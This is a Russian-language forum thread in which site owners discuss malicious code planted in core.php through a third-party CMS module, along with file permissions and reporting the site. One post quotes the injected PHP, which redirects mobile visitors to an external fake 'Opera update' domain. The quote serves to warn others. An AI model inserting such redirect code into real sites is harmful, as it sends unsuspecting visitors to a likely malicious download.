В каком-то из сторонних модулей вредоносный код

9.83K
.
Enter нажат, к чему теперь рыданья…
Вот ещё и в этой теме вражеский код, который в core.php, напишу
if($_SERVER['HTTP_REFERER'] =='') 
{@setcookie("dir", 1, time()+60*60*24*7*30);} 
elseif(preg_match('/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk)/i',$_SERVER['HTTP_USER_AGENT']) && $_COOKIE["adv"] != 1 && $_COOKIE["dir"] != 1) 
{ 
@setcookie("adv", 1, time()+60*60*24*7); 
@header("Location: http://operaupdt.ru/); 

}
.
Вот еще одно подтверждение пословице "Доверяй но проверяй !" так что пишите модули для своего сайта сами !
.
Определённо на этот сайт надо пожаловаться Опере. Они закрывают такие сайты
.
Блиносвёрт ?
код для ядра может быть в ридми
.
Если я не ошибаюсь, то, чтобы перезаписать core.php, на него необходимо сначала выставить необходимые права?
.
Intelligent, Могет выти неприятные моменты. Например кто то скажет: сморите, создатели то обманывают прихожан реса..
Пока суть да дело, некоторый народ свинтит с движка.
Не важно что это внедрённый в модуль код, а правильная шумиха вокруг этово..
Внести так сказать сомнения.. - это как вариант №2.
.
точка невозврата
Intelligent, файл заменяется, права не при чем.
.
Enter нажат, к чему теперь рыданья…
Intelligent (09.07.2012/17:30)
Если я не ошибаюсь, то, чтобы перезаписать core.php, на него необходимо сначала выставить необходимые права?
444 ставить? Не удобно самому работать. А 644 файл то закрыт для записи, но владелец может его заменить не изменяя права.
.
Надеюсь умника быстро найдут
.
Ну так давайте прошуршим? Pillott, у тебя четвёрка?
Всего: 467